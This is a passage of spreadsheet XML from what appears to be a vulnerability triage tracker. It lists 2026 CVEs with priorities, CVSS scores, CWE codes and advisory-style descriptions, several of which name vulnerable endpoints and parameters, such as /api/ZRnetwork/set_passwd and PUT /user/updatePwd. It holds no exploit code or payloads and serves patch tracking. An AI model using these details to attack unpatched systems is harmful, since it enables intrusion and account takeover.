      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101264</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Ziroom ZHOME A0101 1.0.1.0. Impacted is an unknown function of the file /api/ZRnetwork/set_passwd. This manipulation of the argument password1 causes command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101264</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>The decompress package for Node.js extracts archives. Prior to 10.2.2 and 11.1.4, the default decompress(input, output) API relies on lexical containment checks that do not account for the kernel following a planted symlink chain. An attacker can supply a crafted archive containing chained symlink entries so that a later entry resolves outside the output directory. This allows files outside output to be read or written, and overwriting startup scripts or configuration can lead to remote code execution. The maintained @xhmikosr/decompress package is fixed in 10.2.2 and 11.1.4, but the separately affected unmaintained decompress package remains unpatched through 4.2.1. This vulnerability results from a bypass of the incomplete hardening for CVE-2026-53486. @xhmikosr/decompress is fixed in versions 10.2.2 and 11.1.4.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, is_pem_format in jwt/utils.py is affected because is_pem_format does not recognize every PEM representation accepted by the cryptography loader. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a mutated public-key PEM as raw key bytes. As a result, HMACAlgorithm.prepare_key treats the unrecognized asymmetric public key as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102361</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains a missing authentication vulnerability in the PUT /user/updatePwd endpoint that allows unauthenticated attackers to reset any storefront account password. Attackers can supply a target username in the request body to overwrite passwords without verification, enabling account takeover and access to orders and personal data.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102361</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49994</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Bluehood monitors local bluetooth activity. Prior to version 0.7.1, when auth_enabled is set in Bluehood, only the HTML page handlers enforced session validation. The /api/* handlers (settings, devices, groups, per-device endpoints including /api/device/{mac}/notes) called no auth check at all. A network attacker reachable on the dashboard port could read Bluetooth tracking data and modify application state — including the heartbeat URL, prune retention, device groups, and per-device notes — without a session cookie. This issue has been patched in version 0.7.1.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49994</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82378</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization in the OAuth 1.0a authorization endpoint of Apache Roller 6.1.5 allows an unauthenticated remote attacker who learns an outstanding request token for a configured site-wide consumer to bind that token to an arbitrary user account, including an administrator, by submitting an unsigned authorization request. The endpoint derives the authorizing identity from a request-supplied value rather than the authenticated session. Only installations that configure an OAuth 1.0a site-wide consumer are affected, and exploitation requires knowledge of one of its outstanding request tokens. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which binds authorization to the logged-in session.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82378</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101074</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Netcore NR289-GE 1.4.5102. The affected element is the function password-check of the file /bin/boa of the component Authentication. Executing a manipulation of the argument Username can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101074</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101860</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in RaspAP raspap-webgui up to 3.5.5. Affected by this issue is the function PluginInstaller::addSudoers of the file src/RaspAP/Plugins/PluginInstaller.php of the component sudo Configuration. Performing a manipulation results in improper privilege management. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101860</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12264</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Arbitrary file write via HA Failover Config sync upload leading to remote code execution.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12264</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12265</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>postgresql, gin</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Insufficient access control in HA failover endpoint leading to destructive PostgreSQL database operations.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12265</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12268</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to PowerShell command injection in Windows DNS SPF/TXT record push leading to remote code execution.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12268</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12269</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-434</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central 6.2.0 build below 6201 had a Keepalived configuration injection vulnerability in the HA configuration workflow. This issue could allow an authenticated operator-level user to modify the Keepalived configuration and potentially execute commands as root on the DDI Central host.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12269</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78424</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper parameter handling in NeuVector allows any authenticated user who holds the namespaced Runtime Policies (write) permission or anyone with access to NeuVector’s internal gRPC certificate key pair the ability to inject OS commands in the privileged enforcer container, which can lead to the complete compromise of the worker node. This affects NeuVector 5.4 before 5.4.11, NeuVector 5.5 before 5.5.4, NeuVector 5.6 before 5.6.2 and potentially older versions.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78424</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85134</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Unrestricted upload of file with dangerous type vulnerability in Bimser Solution Software Trade Inc. EBA Plus Document and Workflow Management System allows Upload a Web Shell to a Web Server.
This issue affects eBA Plus Document and Workflow Management System: from 6.7.141 before 10.0.11.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85134</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86595</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Iron Mountain Archiving Services Inc. EnVision allows SQL Injection.
This issue affects enVision: before 260655.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86595</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86950</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
